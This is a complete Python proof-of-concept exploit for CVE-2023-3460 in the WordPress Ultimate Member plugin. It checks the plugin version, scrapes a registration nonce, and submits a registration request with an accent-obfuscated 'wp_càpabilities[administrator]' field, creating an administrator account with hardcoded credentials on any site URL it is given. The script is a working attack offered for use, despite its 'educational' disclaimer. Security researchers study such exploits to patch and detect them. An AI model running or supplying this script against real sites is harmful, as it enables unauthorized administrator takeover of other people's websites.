# CVE-2023-3460
# Ultimate Member Unauthorized Administrator Access Exploit 
# by Secragon
# PoC for educational/research purposes only
# Use it at your own risk!

import re
import sys
import urllib3
import requests
import argparse
from colorama import Fore, Style

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


username = "secragon"
password = "OffensiveSecurity123"
email = "exploit@secragon.com"

def check_version(target):
    
    print(Style.RESET_ALL + "Site version:", end=' ')
    try:
        r = requests.get(f"{target}/wp-content/plugins/ultimate-member/readme.txt", verify=False)
        version = re.search(r"Stable tag: (.*)", r.text).groups()[0]

    except:
        print(Fore.RED + f'error...')
        exit()


    if int(version.replace('.','')) < 267:
        print(Fore.GREEN + f'{version} - vulnerable!')
    else:
        print(Fore.RED + f'{version} - not vulnerable!')
        exit()

def add_admin(target, form_id):

    headers = {
        'User-Agent': 'Secragon Offensive Agent'
    }

    print(Style.RESET_ALL + "Getting nonce:", end =' ')

    s = requests.Session()
    try:
        r = s.get(f'{target}/index.php/register/', headers=headers, verify=False)
        nonce = re.search(r"name=\"_wpnonce\" value=\"(.{10})\"", r.text).groups()[0]
        print(Fore.GREEN + f"{nonce}")
    except:
        print(Fore.RED + f'error...')
        exit()


    data = {
        f'user_login-{form_id}' : username,
        f'user_email-{form_id}': email,
        f'user_password-{form_id}': password,
        f'confirm_user_password-{form_id}': password,
        f'first_name-{form_id}': 'Exploit',
        f'last_name-{form_id}': 'bySecragon',
        'form_id': form_id,
        'um_request': '',
        '_wpnonce': nonce,
        'wp_càpabilities[administrator]': 1
    }

    print(Style.RESET_ALL + "Adding a new admin:", end =' ')


    r = s.post(f'{target}/index.php/register/', data=data, headers=headers, verify=False)
    if r.history[0].status_code == 302:
        print(Fore.GREEN + f'done')
    else:
        print(Fore.RED + f'error...')
        exit()

    print()
    print(Style.RESET_ALL + "All set! You can now login using the following credentials:")
    print(f'Username: {username}')
    print(f'Password: {password}')
    print()



print()
print(Fore.BLUE + "\t\t --- Ultimate Member exploit ---")
print("\t\t   (unauthorized admin access)")
print(Fore.RED + "\t\t\t\t\tby gbrsh@secragon")
print(Style.RESET_ALL)


parser = argparse.ArgumentParser()

parser.add_argument('url', help='http://wphost')

if len(sys.argv) == 1:
    parser.print_help()
    print()
    exit()

args = parser.parse_args()

check_version(args.url)
add_admin(args.url, 6)